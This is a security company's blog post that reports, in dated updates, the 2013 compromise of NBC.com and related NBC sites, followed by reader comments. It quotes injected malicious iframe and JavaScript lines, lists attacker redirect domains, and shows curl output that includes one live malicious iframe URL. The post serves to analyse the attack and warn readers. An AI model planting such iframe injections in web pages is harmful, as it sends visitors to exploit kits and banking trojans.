• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

NBC Website HACKED – Be Careful Surfing

February 21, 2013Tony Perez

121
SHARES
FacebookTwitterSubscribe

Breaking, the NBC site is currently compromised and blacklisted by Google. Anyone that visits the site (which includes any sub page) will have malicious iframes loaded as well redirecting the user to exploit kits (Redkit):

*Update: Not only NBC.com, but many other NBC sites, including Late Night with Jimmy Fallon, Jay Lenos garage and others.

Screen Shot 2013-02-21 at 11.15.51 AM

If you are visiting it from Chrome or Firefox would get the following warning:

Screen Shot 2013-02-21 at 11.18.14 AM

It seems that the payload is conditional, so a different iframe domain is loaded each time (cycling out various domains). Some of the malicious domains we identified include:

hxxp://walterjeffers.com/
hxxp://nikweinstein.com/
hxxp://umaiskhan.com/
htxp://wordpresspluginsstudio.com/ctuk.html

All their pages had this iframe injected:

<iframe src="httx://nikweinstein.com/cl/google.php" width=1 height=1..

And this is what got added to their javascript files:

document.writeln (" <iframe src="httx://walterjeffers.com/ctuk.html" width=1&nbsp..

Note that these domains are changing, this tells us that something on the server is generating the payload. This isn’t an uncommon practice, it also tells us that the script is likely still on the box. The fact that it’s impacting other sites tells us that the compromise might extend beyond the web application and onto the server. If those other sites are stored on separate boxes then we’re looking at a much bigger, network, compromise, but that is speculative at the moment.

Our research team is analyzing the case (and the malware) and we will post more updates soon. What we can tell is that you should not visit NBC’s site right now. More details on the scan results here: http://sitecheck.sucuri.net/.

The folks at hitmanpro.blog are confirming that it is a drive-by-download attack, specifically using the Citadel Trojan, used for bankin fraud and cyber-espionage. As for the attack vector leading to the compromise, that’s always a challenge to speculate on.

It also appears that the compromise extends to other properties, just found out that the Late Night with Jimmy Fallon is also compromised:

Screen Shot 2013-02-21 at 11.48.24 AM

****Update: 13:42 PST | 02/21/2013*****

We did come across this great post by Dancho Danchev in which he better explains things. It looks like this is, was, a complex attack cycling out drive-by-downloads and malicious redirects. He adds the following domains to the growing list of those being cycled for the iframes:

hxxp://priceworldpublishing.com/aynk.html
hxxp://toplineops.com/mtnk.html
hxxp://moi-npovye-sploett.com/qqqq/1.php
hxxp://www.jaylenosgarage.com/trucks/PHP/google.php

He expands things with a list of domains being used for redirection:

hxxp://gonullersultani.net/znzd.htm
hxxp://erabisnis.net/znzd.htm
hxxp://electricianfortwayne.info/62.html
hxxp://moi-npovye-sploett.com/cGeQc0wz1KPI/larktion.php

He goes on to explain the payload being dropped, payload hash. He goes on to break down it’s phone home mechanisms and begins to correlate this attack with others to find some association. Based on his analysis he correlates these attackers with the same group responsive for the Facebook and Verizon spear phishing attempts a few days ago. He goes on to provide a lot more data.

Some are attributing the the payload itself to be generated by the RedKit Exploit Kit, but that is still unconfirmed.

While some folks are reporting it was only infected for 15 minutes we’re not too sure about that, as of right now, emulating a number of agents and crawling various links we are are still able to get it to render:

Screen Shot 2013-02-21 at 1.54.08 PM

****Update: 20:33 PST | 02/21/2013*****

So it’s been many hours since the compromise was first identified and we’re still seeing the infection on the NBC website. The same infection as what has been discussed all day but only on a few pages. To make sure that our scanner is not broken I have started testing manually via terminal to verify that it is in fact still infected. I am jumping between various honeypots and checking like this:

# curl -sD - http://www.nbc.com/community/video/season-4-premiere-jim-rash/n31580/ | grep "<iframe"
		_iframeCode = '<iframe id="nbc-video-widget" width="'+_width+'" height="'+_height+'" src="'+playerPath+'?vid=n31580" frameborder="0"></iframe>';
	 var nbcAd728x90='<iframe id="ad728x90" name="ad728x90" src="about:blank" width=728 height=90 noresize scrolling=no hspace=0 vspace=0 frameborder=0 marginheight=0 marginwidth=0>>/iframe>';
<iframe src="http://nikweinstein.com/cl/google.php" width=1 height=1 frameborder="0"></iframegt;

This tells me a couple of things.

First, it’s either caught up in some kind of CDN cache or it’s conditional. I am not able to replicate on every box, it seems as I jump around it comes and goes but SiteCheck continues to catch it. I am starting to think that it’s caught up in cache though, which is still exceptionally dangerous for visitors.

What are others seeing?


Unfortunately more and more large and small organizations are getting hit every day with similar compromises. If you find yourself on the sad end of this stick let us know at info@sucuri.net.

121
SHARES
FacebookTwitterSubscribe

Categories: Security Education, Website Malware InfectionsTags: Hacked Websites, Website Blacklist

About Tony Perez

Tony is the Head of Security Products at GoDaddy and Sucuri Co-Founder. His passion lies in educating and bringing awareness about online threats to business owners. His passions revolve around understanding the psychology of bad actors, the impacts and havoc hacks have on website owners, and thinking through the evolution of attacks. You can find his personal thoughts on security at perezbox.com and you can follow him on Twitter at @perezbox.

Reader Interactions

Comments

  1. Guest

    February 21, 2013

    “Note that these domains are changing, so it is likely that the attackers still have access there.”

    hahahaha….NO. These random domains being returned is automated. How are you even a infosec blogger? Who let you on a computer?

    • yo dawg

      February 21, 2013

      ok genius, explain how they’re updating the iframe url with generated urls?

    • Guest

      February 21, 2013

      Hi Guest

      Thanks for all the great insight. The statement is valid. As to yours however:

      “These random domains being returned is automated”

      If you look at the site or any of the discussion on the topic you see that it is not being returned via an API, which would then support your statement, it’s being generated on the server itself. If that is the case, then there is likely a script doing the generation. As it’s still being generated it’s safe to assume that there is some script on the server doing the generation. It’s not coming from the iframe itself, something is causing it. But maybe I missed the research that shows document.write also does self generation… let me know if I did..

      That in turn leads you to believe that if a script is still on the box creating the generation regardless of it being removed that it is feasible that it also contains the backdoor to gain access or that another backdoor also exists giving them access. But the sheer fact that its still generating, does that not constitute access?

      But you’re right, what do I know. Would love to see your post or documentation that better explains the regeneration.

      Thanks

      Tony

      • Gabe

        February 21, 2013

        And that, folks, is how you reply to a troll.

        • Nathan Vaughn

          February 22, 2013

          Wrong. The only correct response is none. You starve a troll. Duh.

  2. Michael Whitehurst

    February 21, 2013

    ERMAGERD CHINA

  3. Chilly8

    February 22, 2013

    It might be an error on the part of Google or Yahoo. Yahoo’s site was saying, for some time, that the website for my online radio station had malware in it, when it did not, so take these warnings with a grain of salt

  4. disqus_8sRkD8r4cq

    March 11, 2013

    http://www.videogameoracle.blogspot.com

  5. China Hate the World!

    March 12, 2013

    Down with china!

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.